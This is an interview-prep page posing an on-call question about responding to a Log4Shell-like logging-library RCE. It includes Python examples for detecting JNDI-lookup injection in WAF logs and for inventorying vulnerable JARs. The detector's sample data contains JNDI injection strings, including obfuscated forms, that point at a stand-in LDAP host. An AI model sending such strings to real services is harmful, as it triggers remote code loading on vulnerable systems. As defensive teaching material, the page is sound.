Code Room

On-call · Hard · oc-g141

Subject: Security incidents
Level: Senior–Staff
~50 min
Common in: Security · Reliability & on-call interviews
Industries: Technology, Software development

Question

A new critical CVE drops for a Java logging library you use widely (RCE via a crafted log string, similar to Log4Shell). Within 2 hours your WAF logs show inbound requests containing '${jndi:ldap://...}' patterns to your public APIs. One internal host's EDR flags an outbound LDAP+HTTP connection to an attacker server followed by a curl pulling a binary. Your service mesh has 200+ Java services; you don't have a clean inventory of which embed the vulnerable version. How do you triage, contain, and remediate at scale under active exploitation?

What a strong answer looks like

Stop the bleeding first (mitigate), then form hypotheses from the real signals you already have (the WAF hits and the EDR alert) rather than from assumptions. Separate root cause from symptom, communicate status as you go, and close with what prevents a repeat.
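As an added example that is not part of the page, here is one way to turn the WAF-log signal in the question into triage data with a short Python script: it normalizes the lookup-nesting tricks that hide the literal `jndi` token, flags the matching requests, and ranks hits by attacking source (for a WAF block list) and by targeted host (to decide which services get looked at first). The JSON log format, its field names and the sample lines are constructed assumptions; real WAFs differ in field names.

```python
"""Triage WAF logs for JNDI-lookup injection attempts.

Added example, not code from the page. Assumes (constructed) JSON log lines
with src_ip, host, path and a 'payload' field holding the inspected header
or body text; real WAFs differ in field names.
"""
import json
import re
from collections import Counter

# Lookup-nesting forms that hide the literal "jndi" token (${lower:j},
# ${upper:J}, ${::-j}). Resolve them to their plain value before matching
# so a detector that only greps for "${jndi:" is not trivially bypassed.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
JNDI_RE = re.compile(r"\$\{\s*jndi:")


def normalize(payload: str) -> str:
    """Collapse nested lookups repeatedly until the string stops changing."""
    prev = None
    s = payload
    while prev != s:
        prev = s
        s = _NESTED.sub(lambda m: m.group(1) or m.group(2) or "", s)
    return s.lower()


def triage(lines):
    """Return one hit record per log line whose payload carries a JNDI lookup."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        norm = normalize(rec["payload"])
        if JNDI_RE.search(norm):
            hits.append({
                "src_ip": rec["src_ip"],
                "host": rec["host"],
                "path": rec["path"],
                "normalized": norm,
                # True when the raw payload needed de-nesting to reveal the token
                "obfuscated": norm != rec["payload"].lower(),
            })
    return hits


def summarize(hits):
    """Rank attacking sources (WAF block list) and targeted hosts (triage order)."""
    return {
        "by_src": Counter(h["src_ip"] for h in hits).most_common(),
        "by_host": Counter(h["host"] for h in hits).most_common(),
    }


# Constructed sample lines; addresses are RFC 5737 documentation ranges.
SAMPLE_LINES = [json.dumps(r) for r in [
    {"src_ip": "203.0.113.5", "host": "api.example.test", "path": "/v1/login",
     "payload": "User-Agent: ${jndi:ldap://198.51.100.7:1389/a}"},
    {"src_ip": "203.0.113.5", "host": "api.example.test", "path": "/v1/search",
     "payload": "q=${${lower:j}ndi:ldap://198.51.100.7:1389/b}"},
    {"src_ip": "198.51.100.23", "host": "pay.example.test", "path": "/health",
     "payload": "User-Agent: curl/8.0"},
    {"src_ip": "203.0.113.9", "host": "pay.example.test", "path": "/v2/pay",
     "payload": "X-Api-Version: ${${::-j}${::-n}${::-d}${::-i}:ldap://198.51.100.7:1389/c}"},
]]


if __name__ == "__main__":
    found = triage(SAMPLE_LINES)
    for h in found:
        print(f"{h['src_ip']:>14} -> {h['host']}{h['path']}  obfuscated={h['obfuscated']}")
    print(summarize(found))
```

The `obfuscated` flag is worth keeping in the triage output: requests that needed de-nesting to reveal the token indicate a sender that is deliberately working around pattern-based blocking, which is useful when deciding how much to trust a simple WAF signature as the first containment step.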
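The hard part of the question is the missing inventory across 200+ services. As an added example, not the page's own approach, this Python scanner walks a filesystem (a node's deploy directory or an unpacked container image), opens every JAR/WAR/EAR, recurses into nested archives such as Spring Boot fat jars, finds a marker class and reads the library version from `pom.properties`, then classifies each finding against a fixed version. The marker class path, Maven coordinates and fixed version are placeholders for the hypothetical library in the question (for the real Log4Shell the analogous marker was `org/apache/logging/log4j/core/lookup/JndiLookup.class`); the fixture tree is constructed in a temporary directory so the example runs offline.

```python
"""Inventory scan for a vulnerable library embedded in (nested) JARs.

Added example, not code from the page. The marker class, Maven coordinates
and fixed version are placeholders for a hypothetical logging library; the
fixture tree is constructed in a temp dir so the example runs offline.
"""
import io
import os
import tempfile
import zipfile
from dataclasses import dataclass

MARKER_CLASS = "org/example/logging/lookup/JndiLookup.class"   # placeholder
POM_ARTIFACT = "org.example/logger-core"                        # placeholder groupId/artifactId
FIXED_VERSION = "1.3.0"                                         # placeholder
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    disk_path: str   # archive on disk that (transitively) contains the marker
    nested: str      # chain of nested archive entries, "" when at top level
    version: str     # from pom.properties, "unknown" if absent


def _parse_version(v):
    """Turn '1.2.0' into (1, 2, 0); non-numeric parts become 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in v.split("."))


def is_vulnerable(version, fixed=FIXED_VERSION):
    """Treat unknown versions as vulnerable until proven otherwise."""
    return version == "unknown" or _parse_version(version) < _parse_version(fixed)


def _version_from(zf):
    for name in zf.namelist():
        if name == f"META-INF/maven/{POM_ARTIFACT}/pom.properties":
            for line in zf.read(name).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
    return "unknown"


def _scan_zip(zf, disk_path, chain, findings):
    names = zf.namelist()
    if MARKER_CLASS in names:
        findings.append(Finding(disk_path, "/".join(chain), _version_from(zf)))
    for name in names:                       # recurse into fat-jar / WAR nesting
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            _scan_zip(inner, disk_path, chain + [name], findings)


def scan_tree(root):
    """Return a Finding for every archive under root that embeds the marker class."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in sorted(files):
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(path) as zf:
                        _scan_zip(zf, path, [], findings)
                except zipfile.BadZipFile:
                    continue
    return findings


def build_fixture(root):
    """Constructed test tree: a fat jar nesting a vulnerable library jar, a
    service shipping the fixed version, and an unrelated jar."""
    def lib_jar(version):
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as z:
            z.writestr(MARKER_CLASS, b"\xca\xfe\xba\xbe")       # fake class bytes
            z.writestr(f"META-INF/maven/{POM_ARTIFACT}/pom.properties", f"version={version}\n")
        return buf.getvalue()
    for svc in ("svc-a", "svc-b", "svc-c"):
        os.makedirs(os.path.join(root, svc), exist_ok=True)
    with zipfile.ZipFile(os.path.join(root, "svc-a", "app.jar"), "w") as z:
        z.writestr("BOOT-INF/lib/logger-core-1.2.0.jar", lib_jar("1.2.0"))
    with open(os.path.join(root, "svc-b", "logger-core-1.3.0.jar"), "wb") as fh:
        fh.write(lib_jar("1.3.0"))
    with zipfile.ZipFile(os.path.join(root, "svc-c", "other.jar"), "w") as z:
        z.writestr("com/example/Other.class", b"\xca\xfe\xba\xbe")


def demo():
    """Build the fixture, scan it, and return (vulnerable, all) as relative tuples."""
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        found = scan_tree(root)
        rel = lambda f: (os.path.relpath(f.disk_path, root).replace(os.sep, "/"), f.nested, f.version)
        return [rel(f) for f in found if is_vulnerable(f.version)], [rel(f) for f in found]


if __name__ == "__main__":
    vulnerable, everything = demo()
    for item in everything:
        print(("VULNERABLE " if item in vulnerable else "ok         ") + str(item))
```

Run it per node (or per image layer in CI) and ship the `Finding` tuples to a central sheet keyed by service: that is the inventory the question says is missing, and it distinguishes services that merely ship the library from those that ship a version below the fix. Treating `unknown` as vulnerable is deliberate; a shaded JAR with a stripped `pom.properties` is exactly where the library hides.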
